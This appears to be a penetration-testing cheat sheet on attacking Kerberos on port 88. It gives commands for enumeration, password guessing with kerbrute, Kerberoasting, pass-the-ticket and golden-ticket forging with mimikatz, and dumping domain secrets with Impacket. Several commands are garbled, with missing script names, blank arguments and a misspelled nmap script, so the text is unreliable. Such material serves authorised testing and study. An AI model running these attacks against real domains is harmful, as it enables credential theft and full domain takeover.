Skip to main content


Default Port: 88

Kerberos is a network authentication protocol that works on the basis of "tickets" to allow nodes to prove their identity over a non-secure network in a secure manner. Kerberos provides mutual authentication—both the user and the server verify each other's identity.


Identify Kerberos

To find all machines on a network that respond to Kerberos on TCP port 88:

nmap -p 88 --open --script=keberos -Pn -oA nmap/Kerberos



We can use from Impacket to request Service Principal Names (SPNs) which might reveal valuable information and valid usernames.

python -request -dc-ip DOMAIN/user

Attack Vectors

Password Guessing

Test for weak passwords associated with Kerberos-enabled users.

kerbrute password -d -t UsersPasswords.txt

Pass the Ticket

Once a valid Kerberos ticket is obtained, PtT (Pass the Ticket) attacks can be performed using mimikatz.

mimikatz "kerberos::ptt ticket.kirbi"

Replace "ticket.kirbi" with your Kerberos ticket file.

mimikatz injects this ticket into memory, so any following command is authenticated against the Kerberos server using this ticket.


User accounts with SPNs can be Kerberoasted. This involves requesting a service ticket for the user, which can then be cracked offline.

python -request -dc-ip DOMAIN/user


Secrets Dumping

Once the system is compromised, a dump of all critical data including tickets, hashes, etc. can be performed to extend the attack.

Using from Impacket:

python -just-dc domain/Administrator:Password@

Replace "domain/Administrator:Password" with the valid user and password.

Golden Ticket Attack

Creating a golden ticket allows virtually unrestricted access to the whole domain. For this, using mimikatz commands:

mimikatz "kerberos::golden /user:Administrator / /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500"